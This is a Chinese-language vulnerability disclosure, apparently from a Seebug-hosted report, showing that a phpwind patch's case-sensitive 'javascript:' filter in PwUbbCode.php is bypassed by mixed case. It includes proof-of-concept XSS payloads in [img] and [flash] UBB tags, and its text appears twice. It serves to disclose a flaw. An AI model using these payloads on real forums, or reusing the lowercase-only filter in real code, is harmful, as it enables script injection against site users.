### 简要描述: 新发布的修复补丁引出该问题 ### 详细说明: http://www.phpwind.net/read/2993589 下载最新补丁代码PwUbbCode.php 添加了如下一个函数 [<img src="https://images.seebug.org/upload/201305/211848154018d989297767587245b2b4a38c4549.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/211848154018d989297767587245b2b4a38c4549.jpg) ``` if(strpos($path, 'javascript:')!==false) { return ''; } ``` 这个是解决不了问题的,strpos只是检测了javascript的小写形式。 变换一下即可触发 ### 漏洞证明: 回帖或者发帖处, 高级-》代码 ie6下触发。 [img]jAvascript:alert(document.domain)[/img] [<img src="https://images.seebug.org/upload/201305/21185119f4e1d4865f15fbfe707c3dde75cadf3a.jpg" alt="2ie6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/21185119f4e1d4865f15fbfe707c3dde75cadf3a.jpg) 在发帖回帖处写入 高级--》代码 [flash=480,400,1] jAvascript:alert(document.domain)[/flash] 各个浏览器应该都是可以触发的。 [<img src="https://images.seebug.org/upload/201305/21190123ef9bac91e05a857f3044fc7746bcafe4.jpg" alt="4.jpg"...
### 简要描述: 新发布的修复补丁引出该问题 ### 详细说明: http://www.phpwind.net/read/2993589 下载最新补丁代码PwUbbCode.php 添加了如下一个函数 [<img src="https://images.seebug.org/upload/201305/211848154018d989297767587245b2b4a38c4549.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/211848154018d989297767587245b2b4a38c4549.jpg) ``` if(strpos($path, 'javascript:')!==false) { return ''; } ``` 这个是解决不了问题的,strpos只是检测了javascript的小写形式。 变换一下即可触发 ### 漏洞证明: 回帖或者发帖处, 高级-》代码 ie6下触发。 [img]jAvascript:alert(document.domain)[/img] [<img src="https://images.seebug.org/upload/201305/21185119f4e1d4865f15fbfe707c3dde75cadf3a.jpg" alt="2ie6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/21185119f4e1d4865f15fbfe707c3dde75cadf3a.jpg) 在发帖回帖处写入 高级--》代码 [flash=480,400,1] jAvascript:alert(document.domain)[/flash] 各个浏览器应该都是可以触发的。 [<img src="https://images.seebug.org/upload/201305/21190123ef9bac91e05a857f3044fc7746bcafe4.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/21190123ef9bac91e05a857f3044fc7746bcafe4.jpg) [<img src="https://images.seebug.org/upload/201305/2215180151c2e9565314a1126e774b8abc76b9fb.png" alt="fuckphpwind.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2215180151c2e9565314a1126e774b8abc76b9fb.png)
